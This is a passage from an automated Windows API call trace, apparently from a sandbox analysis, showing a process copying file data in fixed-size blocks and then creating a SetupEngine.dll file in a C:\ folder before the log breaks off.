lpOverlapped=0x0) returned 1 [0079.857] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.857] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.857] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.857] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.857] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.857] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.857] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.857] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.858] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.858] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.858] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.858] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.858] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.858] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.858] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.858] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.859] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.859] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.859] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.859] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.859] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.859] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.859] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.859] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.859] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.860] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.860] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.860] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.860] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.860] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.860] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.860] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.860] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.861] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.861] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.861] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.861] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.861] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.861] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.861] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.862] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.862] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.862] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.862] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.862] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.862] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.862] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.862] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.863] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.863] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.863] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.863] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.863] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.863] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.863] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.863] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.864] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.864] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.864] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.864] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.864] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.864] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.864] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.864] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.865] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.865] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.865] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.865] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.865] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.865] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.865] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.865] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.866] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.866] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.866] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.866] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.866] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.866] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.867] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.867] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.867] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.867] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.867] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.867] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.868] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x158, lpOverlapped=0x0) returned 1 [0079.868] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0079.868] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0079.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0079.868] GetLastError () returned 0x0 [0079.868] SetLastError (dwErrCode=0x0) [0079.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0079.868] WriteFile (in: hFile=0x428, lpBuffer=0x92460*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x92460*, lpNumberOfBytesWritten=0x327ef70*=0x160, lpOverlapped=0x0) returned 1 [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0079.871] GetLastError () returned 0x0 [0079.871] SetLastError (dwErrCode=0x0) [0079.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0079.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0079.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0079.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0079.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0079.871] CloseHandle (hObject=0x428) returned 1 [0080.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0080.255] CloseHandle (hObject=0x42c) returned 1 [0080.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0080.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0080.255] AreFileApisANSI () returned 1 [0080.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0080.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4c) returned 0x6d108 [0080.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x6d108, cchWideChar=38 | out: lpWideCharStr="C:\\588bce7c90097ed212\\SetupEngine.dll") returned 38 [0080.256] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupEngine.dll" (normalized: "c:\\588bce7c90097ed212\\setupengine.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0080.274] GetFileType (hFile=0x42c) returned 0x1 [0080.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0080.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0080.275] GetLastError () returned 0xb7 [0080.275] SetLastError (dwErrCode=0xb7) [0080.275] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0080.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0080.276] CloseHandle (hObject=0x42c) returned 1 [0080.277] AreFileApisANSI () returned 1 [0080.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: 